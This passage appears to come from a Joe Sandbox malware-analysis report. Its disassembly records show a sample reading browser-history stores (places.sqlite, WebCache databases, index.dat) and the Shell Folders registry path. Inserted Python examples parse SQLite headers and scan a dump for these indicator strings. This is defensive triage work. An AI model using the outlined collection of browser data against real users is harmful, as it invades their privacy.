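PAYLOAD_FRACTIONS = b"\x40\x20\x20"        # offset 21, 3 bytes  -> 3-byte memcmp "@  "


def parse_sqlite_header(page1: bytes) -> dict:
    """Apply the page-1 checks SQLite itself performs on open and return the
    parsed fields.  ok=False with a reason means SQLite would report
    'file is not a database'."""
    if len(page1) < 100:
        return {"ok": False, "reason": "header shorter than 100 bytes"}
    if page1[0:16] != SQLITE_MAGIC:
        return {"ok": False, "reason": "bad magic"}
    if page1[21:24] != PAYLOAD_FRACTIONS:   # max/min embedded payload and leaf fractions
        return {"ok": False, "reason": "bad payload fractions"}
    page_size = struct.unpack(">H", page1[16:18])[0]
    if page_size == 1:                      # the value 1 encodes 65536
        page_size = 65536
    if not (512 <= page_size <= 65536) or page_size & (page_size - 1):
        return {"ok": False, "reason": "page size not a power of two in 512..65536"}
    write_version, read_version = page1[18], page1[19]
    if read_version > 2:
        return {"ok": False, "reason": "unsupported read version"}
    # 4-byte memcmp: the in-header page count (offset 28) is trusted only when
    # the file change counter (offset 24) equals the version-valid-for number
    # (offset 92); otherwise SQLite falls back to the file size.
    in_header_pages = struct.unpack(">I", page1[28:32])[0]
    page_count_valid = in_header_pages != 0 and page1[24:28] == page1[92:96]
    return {
        "ok": True,
        "page_size": page_size,
        "journal_mode": "wal" if write_version == 2 else "rollback",
        "change_counter": struct.unpack(">I", page1[24:28])[0],
        "page_count": in_header_pages if page_count_valid else None,
        "text_encoding": {1: "utf-8", 2: "utf-16le", 3: "utf-16be"}.get(
            struct.unpack(">I", page1[56:60])[0], "unknown"),
        "sqlite_version": struct.unpack(">I", page1[96:100])[0],
    }


def build_sample_header(page_size=4096, pages=12, change_counter=7,
                        version_valid_for=7, wal=False) -> bytes:
    """Construct a synthetic 100-byte header for testing (constructed data)."""
    h = bytearray(100)
    h[0:16] = SQLITE_MAGIC
    struct.pack_into(">H", h, 16, 1 if page_size == 65536 else page_size)
    h[18] = h[19] = 2 if wal else 1          # write/read version: 2 means WAL
    h[21:24] = PAYLOAD_FRACTIONS
    struct.pack_into(">I", h, 24, change_counter)
    struct.pack_into(">I", h, 28, pages)
    struct.pack_into(">I", h, 56, 1)         # text encoding: UTF-8
    struct.pack_into(">I", h, 92, version_valid_for)
    struct.pack_into(">I", h, 96, 3045001)   # SQLITE_VERSION_NUMBER for 3.45.1
    return bytes(h)


SAMPLE_OK = build_sample_header()
SAMPLE_STALE_COUNT = build_sample_header(change_counter=9, version_valid_for=7)
SAMPLE_NOT_DB = b"PK\x03\x04" + bytes(96)   # a zip header, not a database

if __name__ == "__main__":
    for name, hdr in (("ok", SAMPLE_OK), ("stale", SAMPLE_STALE_COUNT), ("zip", SAMPLE_NOT_DB)):
        print(name, parse_sqlite_header(hdr))
```

Feeding the first 100 bytes of a suspect file to parse_sqlite_header is enough to decide whether it is the kind of artefact this code path consumes; the change-counter comparison is the check that trips on a database copied while the browser still had it open.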
                                                                                                  APIs
                                                                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                  Strings
                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                  • API String ID: 2705122986-2036018995
                                                                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmpqsort
                                                                                                  • String ID: /nosort$/sort
                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  Strings
                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                  • API String ID: 3354267031-2114579845
                                                                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                  APIs
                                                                                                  • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                  • String ID:
                                                                                                  • API String ID: 3473537107-0
                                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset
                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                  APIs
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                  • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@DeleteObject
                                                                                                  • String ID: r!A
                                                                                                  • API String ID: 1103273653-628097481
                                                                                                  • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                  • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                  • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                  • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                  APIs
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1033339047-0
                                                                                                  • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                  • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                  APIs
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                    • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                  • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$memcmp
                                                                                                  • String ID: $$8
                                                                                                  • API String ID: 2808797137-435121686
                                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                    • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                  • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1979745280-0
                                                                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                  APIs
                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                  • API String ID: 2641622041-467022611
                                                                                                  • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                  • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
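The records above repeatedly pair the path and file-name strings (the Shell Folders registry path, the WebCacheV01.dat/WebCacheV24.dat paths, history.dat, places.sqlite) with wide-character CRT calls such as wcscpy, wcscat and wcslen, so a triage scan of the dumped image has to look for them as UTF-16LE and not only as ASCII; the "SQLite format 3" header, by contrast, is narrow in the file it identifies. The following is an added Python example, not part of the Joe Sandbox report or of the analysed sample: it scans a constructed stand-in for a memory dump for the strings listed in these records and reports each hit with its offset and encoding. The capability labels attached to each string are the editor's reading of the surrounding API calls, not output from the report.

```python
from typing import Dict, List, Tuple

# Indicator strings copied from the disassembly records above, mapped to what
# the surrounding API calls in each record suggest they are used for
# (editor's labels, not report output).
INDICATORS: Dict[str, str] = {
    r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders":
        "Shell Folders registry lookup (resolving per-user profile paths)",
    r"Microsoft\Windows\WebCache\WebCacheV01.dat": "WebCache database path",
    r"Microsoft\Windows\WebCache\WebCacheV24.dat": "WebCache database path",
    "places.sqlite": "Firefox places database",
    "history.dat": "Firefox history file",
    "SQLite format 3": "SQLite file header magic",
}

Hit = Tuple[int, str, str, str]  # (offset, encoding, string, meaning)


def scan_dump(dump: bytes, include_wide: bool = True) -> List[Hit]:
    """Return every occurrence of an indicator in `dump`, sorted by offset.

    Each indicator is searched as ASCII and, when include_wide is set, as
    UTF-16LE.  The wide form matters because the records above show these
    strings being handled by wcscpy/wcscat/wcslen, i.e. as wide strings;
    an ASCII-only grep of the dump would miss them.
    """
    hits: List[Hit] = []
    for text, meaning in INDICATORS.items():
        needles = [("ascii", text.encode("ascii"))]
        if include_wide:
            needles.append(("utf-16le", text.encode("utf-16-le")))
        for enc, needle in needles:
            pos = dump.find(needle)
            while pos != -1:
                hits.append((pos, enc, text, meaning))
                pos = dump.find(needle, pos + 1)
    hits.sort()
    return hits


def _wide(s: str) -> bytes:
    """NUL-terminated UTF-16LE string, as a wcscpy target would hold it."""
    return s.encode("utf-16-le") + b"\x00\x00"


def build_sample_dump() -> bytes:
    """Constructed stand-in for a process memory dump (not a real sample)."""
    pad = b"\x00" * 16
    return (
        pad
        + _wide(r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders")
        + pad
        + _wide(r"Microsoft\Windows\WebCache\WebCacheV01.dat")
        + pad
        + _wide("places.sqlite")
        + pad
        + b"SQLite format 3\x00"  # the SQLite header itself is narrow ASCII
        + pad
    )


if __name__ == "__main__":
    for off, enc, text, meaning in scan_dump(build_sample_dump()):
        print(f"0x{off:08x} {enc:8s} {text!r}  # {meaning}")
```

Running the scan with include_wide=False against the same constructed dump finds only the SQLite header, which is the point: the file paths and registry path are stored as wide strings in this image and are invisible to a narrow-string search.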
                                                                                                  APIs
                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 839530781-0
                                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID: *.*$index.dat
                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                  APIs
                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 1156039329-0
                                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 3397143404-0
                                                                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                  APIs
                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 1125800050-0
                                                                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                  • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleSleep
                                                                                                  • String ID: }A
                                                                                                  • API String ID: 252777609-2138825249
                                                                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                  APIs
